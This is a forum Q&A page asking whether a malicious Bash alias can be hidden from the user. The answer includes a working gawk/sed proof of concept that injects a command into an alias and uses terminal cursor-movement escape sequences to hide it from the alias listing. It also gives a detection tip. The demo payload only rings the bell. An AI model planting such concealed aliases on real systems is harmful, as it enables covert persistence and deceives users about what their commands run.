Is it possible to conceal the existence of a malicious alias in Bash on a Linux system and have it executed by the user without their knowledge?
Asked
Active
Viewed 1,608 times
1 Answers
13
It is possible to do that by appending the existing alias onto the malicious one and using cursor movement to hide it if the alias
command is used to display alias definitions. It's not a perfectly foolproof method, but it might go undetected for a while. Piping alias
through hd
will show you whether there are any escape sequences (cursor movement) in your aliases. Here is a proof of concept for how a malicious command could be inserted into an alias:
alias | gawk 'BEGIN {
FS = "[ =\047]"
db = "\\"; sp = db " "; amp = db "&"
sq= "\047"; bell = "\007"; esc = "\033"
}
NR == 3 { len1 = length($2) }
NR == 4 {
alias = $2
orig = gensub(sq, "", "g", substr($0, match($0, "=") + 1))
orig = gensub(" ", db sp, "g", orig)
}
END {
hide = "$" db sq sp "--" sp db "\r" esc "[J" esc "[A" db "\t"
for(i=1; i<len1; i++) {hide = hide esc "[C"}
cmd = "sed -i s/^alias" sp alias ".*/alias" sp alias "=" db sq "echo" sp db bell db db amp db db amp orig db sq hide db sq "/ aliases"
system(cmd)
}'
- The
sed
command modifies a file called "aliases" in place - a real script of this type would go for the throat and modify a real script file so the malicious alias would be activated the next time it's executed. - The malicious part of this example just rings the terminal bell so you know it's working.
- The command that is originally aliased will be executed with the contents of
hide
as an argument so it's conceivable that you could get an error similar to the one reported in the this question. It might be possible to reverse the original and malicious portions to affect this, although this would interfere with arguments being provided to the alias. An attempt is made in the script above to mark the end of arguments with--
. - Instead of chaining the original and malicious parts with
&&
, you could pipe one to the next and make the malicious script (represented above by the simpleecho
command) function as astdin
tostdout
pass-through either to modify the data as it's going across or to hide its existence further by not interfering with other redirection - Another possibility would be to instead include the original alias inside the malicious script which could remove the cursor movement string from the argument list and pass the remainder on to the original.
- I arbitrarily chose records 3 and 4, more intelligent code could target particular aliases, but they need to be adjacent (or the cursor movement could be made more complex).
- The
hide
string could be modified to include different cursor movement and the text of the original alias so thealias
command would appear to show the unmodified alias instead of hiding it along with the malicious part. - To try it out as written, you need to have at least four active aliases, run this script, then source the resulting file with
. aliases
. Then you can try to use the affected alias and see what it looks like when you doalias|hd
. - This could undoubtedly be rewritten a hundred different ways - all better.
- How realistic is this type of threat? I don't have a clue. But if I can do it...
Dennis Williamson
- 60,515
- 14
- 113
- 148